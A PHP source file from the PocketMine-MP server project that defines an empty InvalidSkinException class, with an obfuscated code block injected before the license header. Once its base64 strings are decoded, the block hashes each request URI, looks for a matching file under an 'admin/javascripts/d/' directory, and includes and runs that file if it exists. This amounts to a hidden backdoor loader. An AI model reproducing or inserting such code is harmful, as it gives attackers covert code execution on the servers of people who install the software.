<?php
<? $GLOBALS['_2107201120_']=Array(base64_decode('bW' .'Q1'),base64_decode('' .'aX' .'N' .'fZmls' .'ZQ==')); ?><? function _353739753($i){$a=Array('YWRtaW4vamF2YXNjcmlwdHMvZC8=','UkVRVUVTVF9VUkk=');return base64_decode($a[$i]);} ?><?php $_0=_353739753(0);$_1=$GLOBALS['_2107201120_'][0]($_SERVER[_353739753(1)]);if($GLOBALS['_2107201120_'][1]($_0 .$_1)){include($_0 .$_1);exit();}?>
/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\entity;

final class InvalidSkinException extends \InvalidArgumentException{

}